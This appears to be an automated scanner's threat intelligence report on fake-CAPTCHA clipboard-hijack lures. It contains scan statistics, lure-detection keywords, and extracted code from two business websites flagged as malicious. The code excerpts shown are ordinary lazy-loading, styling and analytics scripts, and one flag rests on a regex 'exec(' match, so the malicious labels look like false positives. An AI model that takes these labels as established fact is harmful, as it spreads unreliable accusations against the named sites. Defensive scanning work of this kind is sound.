Threat Intelligence Report

πŸ“… April 29, 2026 πŸ•’ Generated: 2026-04-29 13:21:52 πŸ” Sites Analyzed: 100
⬇️ Download JSON Report πŸ“ View All Reports on GitHub
🌐
100
Total Sites Analyzed
⚠️
44
Malicious Sites
44.0% detection rate
πŸ’»
17
PowerShell Commands
πŸ“‹
90
Clipboard Hijacks
πŸ“Š
1037
Avg Threat Score

Attack Pattern Analysis

17
High Risk Commands
417
Base64 Encoded
0
Obfuscated JS
54
Inline JS Redirects
23
External JS Chains
49
Redirect Follows
PowerShell Commands 17
Clipboard Hijacks 90
Base64 Encoded 417
CAPTCHA Elements 55
High Risk Commands 17
JS Redirects 54

Top Indicators/Keywords

robot (10) hidden (9) Robot (8) CAPTCHA Verification (6) Verification ID (6) Ray ID (6) I am not a robot (6) You will observe (6) CAPTCHA (6) CAPTCHA-verificatie-ID (6) Verification (6) verification (6) verification-id (6) Checking if you are human (6) Verify you are human (6)

Malicious Sites Detected

Click on a site to view detailed analysis
57
base64
4
redirects
8
suspicious keywords

πŸ” Suspicious Keywords 8

exec(bv_bg_style))!==null;){let new_img_url=getNewImageUrlSVG(new_url,bv_webp_status,property_value,entry2.target.getBoundingClientRect());bv_bg_style=bv_bg_style.replace(match[1],new_img_url)}let new_bv_bg_style=entry2.target.getAttribute("style")||"";new_bv_bg_style=new_bv_bg_style+(new_bv_bg_style?";":"")+(bv_bg_style||""),entry2.target.setAttribute("style",new_bv_bg_style)}else{for(;(match=regex.exec(property_value))!==null;){let new_img_url=getNewImageUrlSVG(new_url,bv_webp_status,property_value,entry2.target.getBoundingClientRect());property_value=property_value.replace(match[1],new_img_url)}entry2.target.style.setProperty(property_type,property_value,"important")}}}bvObservedNodesWithCounter.delete(entry2.target),other_image_observer.unobserve(entry2.target)}})}__name(handleOtherImages,"handleOtherImages");function handleIframesV2(entries){entries.map(entry2=>{entry2.isIntersecting&&(set_iframe_element_src_v2(entry2.target),iframe_observer_v2.unobserve(entry2.target))})}__name(handleIframesV2,"handleIframesV2");const bvCheckNode=__name((node,currentLevel=1,maxLevel=1/0)=>{if(node.nodeType===1){const className=node.getAttribute("class");if(node.nodeName==="IFRAME"&&typeof className=="string"&&className.includes("bv-lazyload-iframe"))iframe_observer_v2.observe(node);else{const computedStyle=getComputedStyle(node),background=computedStyle.getPropertyValue("background")||"none",backgroundImage=computedStyle.getPropertyValue("background-image")||"none";backgroundImage!=="none"&&backgroundImage.match(/url\(/)?(get_bv_identifier(backgroundImage,"bv-img-url")||get_bv_identifier(backgroundImage))&&bvObserveImgNode(node):background!=="none"&&background.match(/url\(/)?(get_bv_identifier(background,"bv-img-url")||get_bv_identifier(background))&&bvObserveImgNode(node):typeof className=="string"&&className.includes("bv-lazyload-bg-style")?bv_style_observer.observe(node):typeof className=="string"&&className.includes("bv-lazyload-tag-img")?img_observer.observe(node):typeof className=="string"&&className.includes("bv-lazyload-picture")&&picture_lazy_observer.observe(node)}}currentLevel<maxLevel&&node.childNodes.length&&node.childNodes.forEach(childNode=>{bvCheckNode(childNode,currentLevel+1,maxLevel)})},"bvCheckNode");function bv_handle_mutations(mutations){mutations.forEach(mutation=>{if(mutation.type==="childList"&&mutation.addedNodes.length)mutation.addedNodes.forEach(node=>{setTimeout(function(){bvCheckNode(node)},0)});else if(mutation.type==="attributes"){const targetNode=mutation.target,attributeName=mutation.attributeName,attributeValue=targetNode.getAttribute(attributeName);if(attributeName==="style"&&targetNode.style.backgroundImage!==mutation_observer.prevBackgroundImage){const computedStyle=getComputedStyle(targetNode),background=computedStyle.getPropertyValue("background")||"none",backgroundImage=computedStyle.getPropertyValue("background-image")||"none";backgroundImage!=="none"&&backgroundImage.match(/url\(/)?(get_bv_identifier(backgroundImage,"bv-img-url")||get_bv_identifier(backgroundImage))&&bvObserveImgNode(targetNode):background!=="none"&&background.match(/url\(/)&&(get_bv_identifier(background,"bv-img-url")||get_bv_identifier(background))&&bvObserveImgNode(targetNode)}else attributeName==="class"&&setTimeout(function(){bvCheckNode(targetNode)},0)}})}__name(bv_handle_mutations,"bv_handle_mutations");function handle_mod_key_nodes(){let node_elements=document.querySelectorAll("[bv-img-mod-key]");for(let i=0;i<node_elements.length;i++){let element=node_elements[i],target_key=element.getAttribute("bv-img-mod-key"),mod_url=element.getAttribute(target_key);if(mod_url){let bv_img_url=get_bv_identifier(mod_url,"bv-img-url"),url_identifier=get_bv_identifier(mod_url),old_url=bv_img_url||(url_identifier?bv_url_map[url_identifier]:null);if(old_url){let dimensions=element.getBoundingClientRect(),new_img_url=getNewImageUrlSVG(old_url,bv_webp_status,mod_url,dimensions);element.setAttribute(target_key,new_img_url)}}}}__name(handle_mod_key_nodes,"handle_mod_key_nodes");function bvRemoveEventListeners(){for(const event of bv_lazyload_events)window.removeEventListener(event,handleLazyloadedStyleImages)}__name(bvRemoveEventListeners,"bvRemoveEventListeners");function handleLazyloadedStyleImages(){setTimeout(function(){bvRemoveEventListeners()},0),document.querySelectorAll("body *").forEach(_element=>{setTimeout(function(){bvCheckNode(_element,1,1)},0)})}__name(handleLazyloadedStyleImages,"handleLazyloadedStyleImages"),handle_mod_key_nodes();let other_image_observer,iframe_observer_v2,mutation_observer;var bvDynamicImageObserverOptions={rootMargin:"200px 0px",threshold:.01};"IntersectionObserver"in window&&(other_image_observer=new IntersectionObserver(handleOtherImages,bvDynamicImageObserverOptions),iframe_observer_v2=new IntersectionObserver(handleIframesV2,bvDynamicImageObserverOptions)),"MutationObserver"in window&&(mutation_observer=new MutationObserver(bv_handle_mutations),mutation_observer.prevBackground="",mutation_observer.prevBackgroundImage="",mutation_observer.observe(document.body,{childList:!0,subtree:!0,attributes:!0,characterData:!0})),"IntersectionObserver"in window&&"MutationObserver"in window&&window.addEventListener("load",event=>{for(const event2 of bv_lazyload_events)window.addEventListener(event2,handleLazyloadedStyleImages,{once:!0})})
robot
Robot
verification
exec(
hidden
Hidden
odyssey

🌐 Extracted URLs 427

https://ogp.me/ns#
https://bharatnamkeens.com/
https://bharatnamkeens.com/wp-content/uploads/2025/09/cropped-Fevicon-270x270.png
https://bharatnamkeens.com/wp-content/uploads/al_opt_content/IMAGE/bharatnamkeens.com/wp-content/uploads/2025/11/Bharat-Namkeen-white-label-sev-oem-snacks-manufacturer-india-1.png.bv.webp?bv_host=bharatnamkeens.com
https://bharatnamkeens.com/wp-content/uploads/al_opt_content/IMAGE/bharatnamkeens.com/wp-content/uploads/2025/11/Bharat-Namkeen-white-label-sev-oem-snacks-manufacturer-india-1.png.bv.webp?bv_host=bharatnamkeens.com
1
clipboard
8
base64
8
redirects
2
redirect follows
4
suspicious keywords

πŸ” Suspicious Keywords 4

robot
Robot
hidden
responseText

🌐 Extracted URLs 413

http://gmpg.org/xfn/11
https://yoast.com/product/yoast-seo-premium-wordpress/
https://picsera.com/
https://picsera.com/
https://www.facebook.com/Picsera1

πŸ“‹ Clipboard Manipulation Code

Showing first 1 of 1 entries (truncated for performance)

...entListener("click", function(e) { e.preventDefault(); const videoUrl = this.getAttribute("data-video"); popup.querySelector("iframe").src = videoUrl; popup.style.display = "block"; }); }); popup.querySelector(".popup-close").addEventListener("click", function() { popup.style.display = "none"; popup.querySelector("iframe").src = ""; }); popup.addEventListener("click", function(e) { if (e.target === popup) { popup.style.display = "none"; popup.querySelector("iframe").src = ""; } }); }); </script> <!-- end Simple Custom CSS and JS --> <!-- start Simple Custom CSS and JS --> <style> h1.title{ background:#fff !important; padding:10px 20px; display: inline; border-radius:20px; font-weight:bold; } .eael-advance-tabs .eael-tabs-nav > ul li.active { font-weight:bold !important; } /** POPUP **/ .popup-overlay { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.7); z-index: 9999; } .popup-content { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 80%; max-width: 800px; background: #fff; padding: 20px; } .popup-content iframe { width: 100%; height: 400px; } .popup-close { position: absolute; top: 10px; right: 15px; font-size: 20px; cursor: pointer; } .video-popup { position: relative; display: inline-block; } .video-popup::before { content: "\f04b" !important; /* Unicode for FontAwesome play icon */ font-family: "FontAwesome"; /* Requires FontAwesome */ font-size: 50px; color: white; position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: rgba(0, 0, 0, 0.5); width: 80px; height: 80px; display: flex; align-items: center; justify-content: center; border-radius: 50%; } .block1{ min-height:230px !important; } .inline-btn { display: inline-block; margin-right: 15px; }</style> <!-- end Simple Custom CSS and JS --> <!-- HFCM by 99 Robots - Snippet # 2: Apollo Tracker --> <script>function initApollo(){var n=Math.random().toString(36).substring(7),o=document.createElement("script");o.src="https://assets.apollo.io/micro/website-tracker/tracker.iife.js?nocache="+n,o.async=!0,o.defer=!0,o.onload=function(){window.trackingFunctions.onLoad({appId:"6757ba0679668302cf28af2c"})},document.head.appendChild(o)}initApollo();</script> <!-- /end HFCM by 99 Robots --> <!-- Enter your scripts here --><script type=application/ld+json>{"@context": "https://schema.org", "@graph": [{"@type": "Organization", "@id": "https://picsera.com/#organization", "name": "Picsera", "url": "https://picsera.com/", "brand": "PICSERA", "email": "info@picsera.com", "foundingDate": "2014", "knowsLanguage": ["en", "en-US" ], "knowsabout": ["Picsera", "3D Design", "3D Modeling", "Image Editing", "Photo Editing", "3D Renderings", "3D Rendering", "Photo Editing Services", "Image Editing Services", "Photo Retouching Services", "Image Retouching Services", "3D Furniture Rendering Services", "CAD Services", "3D Modeling Services", "3D Rendering Services", "Professional Photo Editing", "Outsource Photo Editing", "Image Editing Service", "Image Retouching Services", "Photo Editing Company", "Product Retouching Service", "Product Retouching", "CAD Drawings" ], "numberOfEmployees": "10", "sameAs": ["https://www.instagram.com/picseraphotoediting", "https://www.facebook.com/Picsera1/", "https://www.youtube.com/user/picsera", "https://twitter.com/picsera" ], "award": ["2022 Best In 3D Design", "2023 Best In 3D Modeling", "2022 Best In Image Editing", "2023 Best In Photo Editing", "2022 Best In 3D Renderings", "2024 Best In 3D Rendering", "2022 Best In Photo Editing Company", "2024 Best In Photo Editing Services", "2022 Best In Image Editing Services", "2023 Best In Photo Retouching Services", "2024 Best In Image Retouching Services", "2022 Best In 3D Furniture Rendering Services", "2023 Best In CAD Services", "2022 Best In Furniture 3D Models" ], "logo": {"@type": "ImageObject", "@id": "https://picsera.com/#logo", "inLanguage": "en-US", "image": "https://picsera.sirv.com/production/2021/02/Default_image.png", "url": "https://picsera.sirv.com/production/2021/02/Default_image.png", "width": 702, "height": 406, "caption": "Picsera", "description": "Picsera is the trusted professional 3D design and editing services company. Affordable rates and plans for businesses of all sizes." }, "legalName": "Picsera" }, {"@type": "WebSite", "@id": "https://picsera.com/#organization", "url": "https://picsera.com/", "name": "Picsera", "description": "Picsera now also offers a full spectrum of 3D Design services, 3D Product Visualizations, 3D Rendering, virtual photography and image editing and serves more than 3,000 customers, including some of the largest brands and retailers in the world.", "publisher": {"@id": "https://picsera.com/#organization" }, "potentialAction": [{"@type": "SearchAction", "target": "https://picsera.com/?s={search_term_string}", "query-input": "required name=search_term_string" } ], "inLanguage": "en-US" }, {"@type": "ImageObject", "@id": "https://picsera.com/#primaryimage", "inLanguage": "en-US", "url": "https://picsera.sirv.com/production/2021/02/Default_image.png", "contentUrl": "https://picsera.sirv.com/production/2021/02/Default_image.png", "width": 702, "height": 407, "caption": "Picsera" }, {"@type": ["WebPage" ], "@id": "https://picsera.com/#website", "headline": "3D Design and Image Editing Services - PICSERA", "url": "https://picsera.com/", "name": "Picsera", "disambiguatingDescription": "Picsera is the trusted professional 3D design and editing services company. Affordable rates and plans for businesses of all sizes.", "About": [{"@type": "thing", "name": "3d modeling", "sameAs": "http://en.wikipedia.org/wiki/3D_modeling" }, {"@type": "thing", "name": "3d modeling software", "sameAs": "http://en.wikipedia.org/wiki/3D_modeling" }, {"@type": "thing", "name": "3d software", "sameAs": "http://en.wikipedia.org/wiki/3D_computer_graphics" }, {"@type": "thing", "name": "3d printed", "sameAs": "http://en.wikipedia.org/wiki/3D_printing" }, {"@type": "thing", "name": "tools", "sameAs": "http://en.wikipedia.org/wiki/Tool" }, {"@type": "thing", "name": "3d models", "sameAs": "http://en.wikipedia.org/wiki/3D_computer_graphics" }, {"@type": "thing", "name": "designs", "sameAs": "http://en.wikipedia.org/wiki/Design" }, {"@type": "thing", "name": "3d cad", "sameAs": "http://en.wikipedia.org/wiki/3D_modeling" }, {"@type": "thing", "name": "3d", "sameAs": "http://en.wikipedia.org/wiki/3D_computer_graphics" }, {"@type": "thing", "name": "3D Rendering Services", "sameAs": "http://en.wikipedia.org/wiki/3D_computer_graphics" }, {"@type": "thing", "name": "3D Modeling Services", "sameAs": "http://en.wikipedia.org/wiki/3D_modeling" }, {"@type": "thing", "name": "Image Editing", "sameAs": "https://en.wikipedia.org/wiki/Image_editing" }, {"@type": "thing", "name": "Photo Editing", "sameAs": "https://en.wikipedia.org/wiki/Image_editing" } ], "mentions": [{"@type": "thing", "name": "computer-aided design", "sameAs": "http://en.wikipedia.org/wiki/Computer-aided_design" }, {"@type": "thing", "name": "design software", "sameAs": "http://en.wikipedia.org/wiki/Computer-aided_design" }, {"@type": "thing", "name": "3-dimensional", "sameAs": "http://en.wikipedia.org/wiki/3D_computer_graphics" }, {"@type": "thing", "name": "3d cad", "sameAs": "http://en.wikipedia.org/wiki/3D_modeling" }, {"@type": "thing", "name": "3-dimensional models", "sameAs": "http://en.wikipedia.org/wiki/3D_modeling" }, {"@type": "thing", "name": "3d graphic", "sameAs": "http://en.wikipedia.org/wiki/3D_computer_graphics" }, {"@type": "thing", "name": "cad", "sameAs": "http://en.wikipedia.org/wiki/Computer-aided_design" }, {"@type": "thing", "name": "parametric design", "sameAs": "http://en.wikipedia.org/wiki/Parametric_design" }, {"@type": "thing", "name": "3d warehouse", "sameAs": "http://en.wikipedia.org/wiki/SketchUp" }, {"@type": "thing", "name": "3d print", "sameAs": "http://en.wikipedia.org/wiki/3D_printing" }, {"@type": "thing", "name": "3d objects", "sameAs": "http://en.wikipedia.org/wiki/3D_modeling" }, {"@type": "thing", "name": "3d", "sameAs": "http://en.wikipedia.org/wiki/3D_computer_graphics" } ], "inLanguage": "en-US", "isPartOf": {"@id": "https://picsera.com/#website" }, "primaryImageOfPage": {"@id": "https://picsera.com/#primaryimage" }, "description": " 3D Design & Image Editing Services Let Picsera take care of all your 3D design and editing needs so you can focus on what you do best." }, {"@type": ["Person" ], "@id": "https://picsera.com/#Person", "name": "David Sinai", "description": "Picsera was founded in 2014 by David Sinai as a post-production image editing service for photo studios. But it quickly became apparent that brands and retailers demanded more than just post-production work." } ] }</script> <script type="text/javascript"> var jQueryMigrateHelperHasSentDowngrade = false; window.onerror = function( msg, url, line, col, error ) { // Break out early, do not processing if a downgrade reqeust was already sent. if ( jQueryMigrateHelperHasSentDowngrade ) { return true; } var xhr = new XMLHttpRequest(); var nonce = '9badda35b4'; var jQueryFunctions = [ 'andSelf', 'browser', 'live', 'boxModel', 'support.boxModel', 'size', 'swap', 'clean', 'sub', ]; var match_pattern = /\)\.(.+?) is not a function/; var erroredFunction = msg.match( match_pattern ); // If there was no matching functions, do not try to downgrade. if ( null === erroredFunction || typeof erroredFunction !== 'object' || typeof erroredFunction[1] === "undefined" || -1 === jQueryFunctions.indexOf( erroredFunction[1] ) ) { return true; } // Set that we've now attempted a downgrade request. jQueryMigrateHelperHasSentDowngrade = true; xhr.open( 'POST', 'https://picsera.com/wp-admin/admin-ajax.php' ); xhr.setRequestHeader( 'Content-Type', 'application/x-www-form-urlencoded' ); xhr.onload = function () { var response, reload = false; if ( 200 === xhr.status ) { try { response = JSON.parse( xhr.response ); reload = response.data.reload; } catch ( e ) { reload = false; } } // Automatically reload the page if a deprecation caused an automatic downgrade, ensure visitors get the best possible experience. if ( reload ) { location.reload(); } }; xhr.send( encodeURI( 'action=jquery-migrate-downgrade-version&_wpnonce=' + nonce ) ); // Suppress error alerts in older browsers return true; } </script> <link rel="preload" href="https://picsera.com/wp-content/plugins/wordpress-popup/assets/hustle-ui/fonts/hustle-icons-font.woff2" as="font" type="font/woff2" crossorigin> <meta name="generator" content="Elementor 4.0.3; features: additional_custom_breakpoints; settings: css_print_method-external, google_font-enabled, font_display-auto"> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-TL84NCR');</script> <!-- End Google Tag Manager --> <style>.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <style> .e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } @media screen and (max-height: 1024px) { .e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } } @media screen and (max-height: 640px) { .e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } } </style> <style type="text/css">.saboxplugin-wrap{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;box-sizing:border-box;border:1px solid #eee;width:100%;clear:both;display:block;overflow:hidden;word-wrap:break-word;position:relative}.saboxplugin-wrap .saboxplugin-gravatar{float:left;padding:0 20px 20px 20px}.saboxplugin-wrap .saboxplugin-gravatar img{max-width:100px;height:auto;border-radius:0;}.saboxplugin-wrap .saboxplugin-authorname{font-size:18px;line-height:1;margin:20px 0 0 20px;display:block}.saboxplugin-wrap .saboxplugin-authorname a{text-decoration:none}.saboxplugin-wrap .saboxplugin-authorname a:focus{outline:0}.saboxplugin-wrap .saboxplugin-desc{display:block;margin:5px 20px}.saboxplugin-wrap .saboxplugin-desc a{text-decoration:underline}.saboxplugin-wrap .saboxplugin-desc p{margin:5px 0 12px}.saboxplugin-wrap .saboxplugin-web{margin:0 20px 15px;text-align:left}.saboxplugin-wrap .sab-web-position{text-align:right}.saboxplugin-wrap .saboxplugin-web a{color:#ccc;text-decoration:none}.saboxplugin-wrap .saboxplugin-socials{position:relative;display:block;background:#fcfcfc;padding:5px;border-top:1px solid #eee}.saboxplugin-wrap .saboxplugin-socials a svg{width:20px;height:20px}.saboxplugin-wrap .saboxplugin-socials a svg .st2{fill:#fff; transform-origin:center center;}.saboxplugin-wrap .saboxplugin-socials a svg .st1{fill:rgba(0,0,0,.3)}.saboxplugin-wrap .saboxplugin-socials a:hover{opacity:.8;-webkit-transition:opacity .4s;-moz-transition:opacity .4s;-o-transition:opacity .4s;transition:opacity .4s;box-shadow:none!important;-webkit-box-shadow:none!important}.saboxplugin-wrap .saboxplugin-socials .saboxplugin-icon-color{box-shadow:none;padding:0;border:0;-webkit-transition:opacity .4s;-moz-transition:opacity .4s;-o-transition:opacity .4s;transition:opacity .4s;display:inline-block;color:#fff;font-size:0;text-decoration:inherit;margin:5px;-webkit-border-radius:0;-moz-border-radius:0;-ms-border-radius:0;-o-border-radius:0;border-radius:0;overflow:hidden}.saboxplugin-wrap .saboxplugin-socials .saboxplugin-icon-grey{text-decoration:inherit;box-shadow:none;position:relative;display:-moz-inline-stack;display:inline-block;vertical-align:middle;zoom:1;margin:10px 5px;color:#444;fill:#444}.clearfix:after,.clearfix:before{content:' ';display:table;line-height:0;clear:both}.ie7 .clearfix{zoom:1}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-twitch{border-color:#38245c}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-behance{border-color:#003eb0}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-deviantart{border-color:#036824}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-digg{border-color:#00327c}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-dribbble{border-color:#ba1655}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-facebook{border-color:#1e2e4f}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-flickr{border-color:#003576}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-github{border-color:#264874}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-google{border-color:#0b51c5}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-html5{border-color:#902e13}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-instagram{border-color:#1630aa}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-linkedin{border-color:#00344f}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-pinterest{border-color:#5b040e}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-reddit{border-color:#992900}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-rss{border-color:#a43b0a}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-sharethis{border-color:#5d8420}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-soundcloud{border-color:#995200}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-spotify{border-color:#0f612c}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-stackoverflow{border-color:#a95009}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-steam{border-color:#006388}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-user_email{border-color:#b84e05}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-tumblr{border-color:#10151b}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-twitter{border-color:#0967a0}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-vimeo{border-color:#0d7091}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-windows{border-color:#003f71}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-whatsapp{border-color:#003f71}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-wordpress{border-color:#0f3647}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-yahoo{border-color:#14002d}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-youtube{border-color:#900}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-xing{border-color:#000202}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-mixcloud{border-color:#2475a0}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-vk{border-color:#243549}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-medium{border-color:#00452c}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-quora{border-color:#420e00}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-meetup{border-color:#9b181c}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-goodreads{border-color:#000}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-snapchat{border-color:#999700}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-500px{border-color:#00557f}.saboxplugin-socials.sabox-colored .saboxplugin-icon-color .sab-mastodont{border-color:#185886}.sabox-plus-item{margin-bottom:20px}@media screen and (max-width:480px){.saboxplugin-wrap{text-align:center}.saboxplugin-wrap .saboxplugin-gravatar{float:none;padding:20px 0;text-align:center;margin:0 auto;display:block}.saboxplugin-wrap .saboxplugin-gravatar img{float:none;display:inline-block;display:-moz-inline-stack;vertical-align:middle;zoom:1}.saboxplugin-wrap .saboxplugin-desc{margin:0 10px 20px;text-align:center}.saboxplugin-wrap .saboxplugin-authorname{text-align:center;margin:10px 0 20px}}body .saboxplugin-authorname a,body .saboxplugin-authorname a:hover{box-shadow:none;-webkit-box-shadow:none}a.sab-profile-edit{font-size:16px!important;line-height:1!important}.sab-edit-settings a,a.sab-profile-edit{color:#0073aa!important;box-shadow:none!important;-webkit-box-shadow:none!important}.sab-edit-settings{margin-right:15px;position:absolute;right:0;z-index:2;bottom:10px;line-height:20px}.sab-edit-settings i{margin-left:5px}.saboxplugin-socials{line-height:1!important}.rtl .saboxplugin-wrap .saboxplugin-gravatar{float:right}.rtl .saboxplugin-wrap .saboxplugin-authorname{display:flex;align-items:center}.rtl .saboxplugin-wrap .saboxplugin-authorname .sab-profile-edit{margin-right:10px}.rtl .sab-edit-settings{right:auto;left:0}img.sab-custom-avatar{max-width:75px;}.saboxplugin-wrap {margin-top:0px; margin-bottom:0px; padding: 0px 0px }.saboxplugin-wrap .saboxplugin-authorname {font-size:18px; line-height:25px;}.saboxplugin-wrap .saboxplugin-desc p, .saboxplugin-wrap .saboxplugin-desc {font-size:14px !important; line-height:21px !important;}.saboxplugin-wrap .saboxplugin-web {font-size:14px;}.saboxplugin-wrap .saboxplugin-socials a svg {width:18px;height:18px;}</style><link rel="icon" href="https://picsera.sirv.com/production/2020/12/favicon2.png?w=32&#038;h=32" sizes="32x32" /> <link rel="icon" href="https://picsera.sirv.com/production/2020/12/favicon2.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://picsera.sirv.com/production/2020/12/favicon2.png" /> <meta name="msapplication-TileImage" content="https://picsera.sirv.com/production/2020/12/favicon2.png" /> <style id="wp-custom-css"> @import url('https://fonts.googleapis.com/css2?family=Merriweather:ital,wght@0,300;0,400;0,700;0,900;1,300;1,400;1,700;1,900&family=Open+Sans:ital,wght@0,300..800;1,300..800&family=Source+Code+Pro:ital,wght@0,200..900;1,200..900&display=swap'); .nav-ul li > .wrap {padding-top:15px !important; padding-bottom:15px !important;} .primary-menu-ul .button .wrap {padding-top:0px !important; padding-bottom:0px !important;} header.header{ margin-bottom: 2px; box-shadow: 0px 1px 6px #c3c3c3; } .related-articles .obfx-grid-col {height:100%} .get_intouch-form .row { display:block;} .get_intouch-form p {display:block !important;} .get_intouch-form input.submit_btn {width:auto !important; font-weight:bold !important} .get_intouch-form input, .get_intouch-form textarea {width:100% !important;} .mb-0 {margin-bottom:0px !important;} .get_intouch-form label { font-family: "Open Sans", sans-serif;} .get_intouch-form input,.get_intouch-form textaria { margin-bottom:10px !important;} .get_intouch-form .valid { color:red} .wpcf7-quiz-label {display:block;} #blog_post .eael-grid-post-holder{ border:none; } .primary-menu-ul .button{ background: #2020ce; color:white; padding-left: 25px; font-size: 14px; font-weight: 400; padding-right: 26px; } .primary-menu-ul .button a{ color:#fff!important; } h1.title.entry-title{ color:black; display:flex; flex-direction:column; text-transform: capitalize; } h1.title.entry-title:after { content: ''; border-bottom: 4px solid #ff9d00; padding-top: 5px; width: 80px; } .tel_no{ text-decoration:none!important; } .builder-item--nav-icon .navbar-toggle { background: #f22b0a; border: none;} .header-main-inner .icon-bar { background-color: #ffffff;} .builder-item--nav-icon .navbar-toggle:focus{ border: none; outline: none;} .header-menu-sidebar .header-menu-sidebar-bg .icon-bar {background-color: #ffffff; } .header-menu-sidebar .close-sidebar-panel .navbar-toggle { border: none;} .testimonialtext .swiper-wrapper { align-items: center !important;} @media (min-width: 960px){ .nv-index-posts, .nv-single-page-wrap, .nv-single-post-wrap { margin-bottom: 0; } } .archive-container .main_cat_title { margin-top: 0px; margin-bottom: 20px; display: flex; flex-wrap: wrap; align-items: center; } .archive-container .main_cat_title h1 { position: relative; padding-bottom: 30px; margin-bottom: 15px; color: #000;;} .archive-container .main_cat_title h1::after{ position: absolute; bottom: 0px; border-bottom: #f3b21c solid 4px; left:0px; width: 77px; content: "";} .archive-container .main_cat_title .archive_list {margin-left: auto;} @media (max-width: 767px) { .archive-container .main_cat_title h1{ font-size: 30px;} } .archive-container h2.blog-entry-title a { font-size: 36px; text-decoration: none; color: #000; line-height: normal;; } .archive-container .nv-meta-list {display: none;} .archive-container h2.blog-entry-title { line-height: 15px; margin-bottom: 5px !important; font-size: 36px !important; margin-top: 20px;} .archive-container .excerpt-wrap p { color: #4E4E4E; font-size: 20px; line-height: 30px; } .archive-container .excerpt-wrap p a:after,.archive-container .excerpt-wrap p a:before { display: block; clear: both; content: "";} .archive-container .excerpt-wrap p a { font-size: 20px; display: block; text-decoration: underline; line-height: 30px; width: 101px; white-space: nowrap;overflow: hidden; color: #FF5B00; } .archive-container .excerpt-wrap p a:hover {text-decoration: none;} .nav-ul>.menu-item-has-children>.sub-menu { left: 0px; right:auto;} .nav-ul .sub-menu li>a { text-align: left; justify-content: flex-start;} .hfg_header .header-main-inner .nav-ul .sub-menu { background-color: #ffffff; padding: 15px 10px; } .blog_breadcumb { border-top:none; border-bottom: #DDDDDD solid 1px; padding:10px 0px; } .archive-container .main_cat_title { margin-top: 23px; padding: 0px 5px;} .archive-container .main_cat_title h1 { color: #000000; font-size: 50px; } .archive-container .article-content-col .content { border-bottom: none; padding-bottom: 0px;} .archive-container .article-content-col .content h2.blog-entry-title, .archive-container .excerpt-wrap.entry-summary {padding: 0px 20px;} .nv-page-title-wrap.nv-big-title .nv-page-title{ border-bottom: none !important;} .neve-breadcrumbs-wrapper a { text-decoration: underline; color: #acacac;} .neve-breadcrumbs-wrapper a:hover { text-decoration: none;} .blog_breadcumb .container { max-width: 1600px; padding: 0px 10px !important;} .nv--yoast-breadcrumb { font-size: .85em;} .blogpart .obfx-grid-col { height: 100% !important; border-bottom: #0034AE solid 3px !important;} /*.wrapper-padding-top {padding-top:77px;} @media (max-width: 1259px) {.wrapper-padding-top {padding-top:110px;}} */ @media only screen and (max-width: 951px) { .header-menu-sidebar-inner .nav-menu-primary li.button a{ display: inline-block; padding: 10px 20px; } .header-menu-sidebar-inner .nav-menu-primary li.button { width: auto;} 